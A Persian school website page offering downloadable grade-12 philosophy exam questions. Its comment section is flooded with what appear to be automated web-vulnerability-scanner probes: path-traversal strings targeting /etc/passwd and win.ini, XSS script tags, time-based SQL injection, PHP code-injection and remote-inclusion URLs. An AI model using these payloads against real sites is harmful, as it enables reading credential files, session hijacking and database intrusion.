نمونه سوالات امتحانی فلسفه دوازدهم


نمونه سوالات امتحانی فلسفه دوازدهم

تعداد بازدید:

53 بازدید

نمونه سوالات امتحانی فلسفه دوازدهم

نظرات:

268 دیدگاه

نمونه سوالات امتحانی فلسفه دوازدهم

انتشار:

01 دی 1397

ارسال شده توسط مدیر سایت

لینک کوتاه این مطلب:

https://darsbox.org/b/5466

نمونه سوالات امتحانی فلسفه دوازدهم

نمونه سوالات امتحانی فلسفه دوازدهم

درس  فلسفه از جمله دروس مشترک پایه دوازدهم  در رشته های انسانی و معارف می باشد. برای موفقیت در این درس یکی از بهترین راه ها حل نمونه سوالات امتحانی می باشد. به همین دلیل بنا داریم در این پست امکان دانلود نمونه سوالات امتحانی فلسفه دوازدهم را برای شما عزیزان فراهم کنیم 

با دوستانتان به اشتراک بگذارید
ارسال دیدگاه

لطفا همه فیلدها را پر کنید

CAPTCHA


نظرات ثبت شده

1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


1 13 دی 1397

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


1 13 دی 1397

..\..\..\..\..\..\..\..\windows\win.ini


1 13 دی 1397

1_9312


1 13 دی 1397

................windowswin.ini


1 13 دی 1397

1


1 13 دی 1397

../../../../../../../../../../windows/win.ini.jpg


1 13 دی 1397

../../../../../../../../../../boot.ini


1 13 دی 1397

1


1 13 دی 1397

'"()&%<acx><ScRiPt >aU2j(9462)</ScRiPt>


1 13 دی 1397

../../../../../../../../../../windows/win.ini


1 13 دی 1397

WEB-INF\web.xml


1 13 دی 1397

/WEB-INF/web.xml


1 13 دی 1397

1'"()&%<acx><ScRiPt >aU2j(9480)</ScRiPt>


1 13 دی 1397

WEB-INF/web.xml


1 13 دی 1397

/\../\../\../\../\../\../\../etc/passwd


1 13 دی 1397

file:///etc/passwd


1 13 دی 1397

1


1 13 دی 1397

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


1 13 دی 1397

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


1 13 دی 1397

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


1 13 دی 1397

1


1 13 دی 1397

/.././.././.././.././.././.././.././../etc/./passwd%00


1 13 دی 1397

%2fetc%2fpasswd


1 13 دی 1397

1


1 13 دی 1397

/etc/passwd


1 13 دی 1397

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


1 13 دی 1397

(select convert(int,CHAR(65)))


1 13 دی 1397

/../..//../..//../..//../..//../..//etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1_9021 13 دی 1397

1


1 13 دی 1397

JyI=


1 13 دی 1397

../../../../../../../../../../etc/passwd.jpg


1 13 دی 1397

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


1 13 دی 1397

@@w34CT


1 13 دی 1397

../../../../../../../../../../../../../../../proc/version


1 13 دی 1397

../../../../../../../../../../etc/passwd


1 13 دی 1397

1


'"()&%<acx><ScRiPt >aU2j(9586)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1'"


1 13 دی 1397

\


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

<!--


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

'"


1 13 دی 1397

1


1'"()&%<acx><ScRiPt >aU2j(9968)</ScRiPt> 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

/www.vulnweb.com


1 13 دی 1397

1


1 13 دی 1397

1


'" 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


<!-- 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


(select convert(int,CHAR(65))) 13 دی 1397

1


/www.vulnweb.com 13 دی 1397

1


1 13 دی 1397

1


))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 13 دی 1397

1


JyI= 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


@@UZtQZ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

comment/.


1 13 دی 1397

1


1 13 دی 1397

comment


\ 13 دی 1397

1


1'" 13 دی 1397

1


1 13 دی 1397

http://hit5ebTMxTCMR.bxss.me/


1 13 دی 1397

1


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}\


1 13 دی 1397

1


1 13 دی 1397

comment


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

${@print(md5(acunetix_wvs_security_test))}


1 13 دی 1397

";print(md5(acunetix_wvs_security_test));$a="


1 13 دی 1397

1


1 13 دی 1397

1


http://hitY7gh3erjVI.bxss.me/ 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

';print(md5(acunetix_wvs_security_test));$a='


1 13 دی 1397

1


1 13 دی 1397

;print(md5(acunetix_wvs_security_test));


1 13 دی 1397

d9Yp1lQs'));select pg_sleep(9); --


comment/. 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

V1pIuouK');select pg_sleep(6); --


1 13 دی 1397

1


1 13 دی 1397

1


comment 13 دی 1397

1


1 13 دی 1397

1


comment 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

MViNfLVy';select pg_sleep(6); --


1 13 دی 1397

-1));select pg_sleep(6); --


1 13 دی 1397

http://testasp.vulnweb.com/t/xss.html?%00.jpg


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

'"()


1 13 دی 1397

-1);select pg_sleep(3); --


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

-1;select pg_sleep(3); --


${@print(md5(acunetix_wvs_security_test))}\ 13 دی 1397

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg 13 دی 1397

1


${@print(md5(acunetix_wvs_security_test))} 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

fqrnkZQ6'; waitfor delay '0:0:3' --


";print(md5(acunetix_wvs_security_test));$a=" 13 دی 1397

1


1 13 دی 1397

1


';print(md5(acunetix_wvs_security_test));$a=' 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1 waitfor delay '0:0:9' --


1 13 دی 1397

-1); waitfor delay '0:0:9' --


'"() 13 دی 1397

1


1 13 دی 1397

-1; waitfor delay '0:0:9' --


;print(md5(acunetix_wvs_security_test)); 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/


1 13 دی 1397

1


1 13 دی 1397

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/


1 13 دی 1397

1


1 13 دی 1397

-1" OR 2+922-922-1=0+0+0+1 --


1 13 دی 1397

-1' OR 2+348-348-1=0+0+0+1 or 'wdh3HxhW'='


WEB-INF\web.xml 13 دی 1397

1


WEB-INF/web.xml 13 دی 1397

1


1 13 دی 1397

testasp.vulnweb.com


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ 13 دی 1397

1


1 13 دی 1397

-1' OR 2+422-422-1=0+0+0+1 --


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini 13 دی 1397

1


1 13 دی 1397

-1 OR 2+867-867-1=0+0+0+1


1 13 دی 1397

http://testasp.vulnweb.com/t/fit.txt?.jpg


1 13 دی 1397

^(#[email protected]#$)(()))******


1 13 دی 1397

1&n940854=v924926


1 13 دی 1397

-1 OR 2+723-723-1=0+0+0+1 --


1 13 دی 1397

Http://testasp.vulnweb.com/t/fit.txt


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini 13 دی 1397

1


1 13 دی 1397

I7vMJWAF


1 13 دی 1397

!(()&&!|*|*|


1 13 دی 1397

1some_inexistent_file_with_long_name.jpg


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini 13 دی 1397

1


1 13 دی 1397

)


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


..\..\..\..\..\..\..\..\windows\win.ini 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


................windowswin.ini 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../windows/win.ini.jpg 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


../../../../../../../../../../boot.ini 13 دی 1397

1


^(#[email protected]#$)(()))****** 13 دی 1397

1


../../../../../../../../../../windows/win.ini 13 دی 1397

1


!(()&&!|*|*| 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


) 13 دی 1397

1


WEB-INF\web.xml 13 دی 1397

1


1 13 دی 1397

1


1 13 دی 1397

1


/WEB-INF/web.xml 13 دی 1397

1


1&n974363=v974504 13 دی 1397

1


testasp.vulnweb.com 13 دی 1397

1


WEB-INF/web.xml 13 دی 1397

1


http://testasp.vulnweb.com/t/fit.txt?.jpg 13 دی 1397

1


1 13 دی 1397

1


/\../\../\../\../\../\../\../etc/passwd 13 دی 1397

1


Http://testasp.vulnweb.com/t/fit.txt 13 دی 1397

1


1 13 دی 1397

1


1some_inexistent_file_with_long_name.jpg 13 دی 1397

1


file:///etc/passwd 13 دی 1397

1


1 13 دی 1397

1


invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././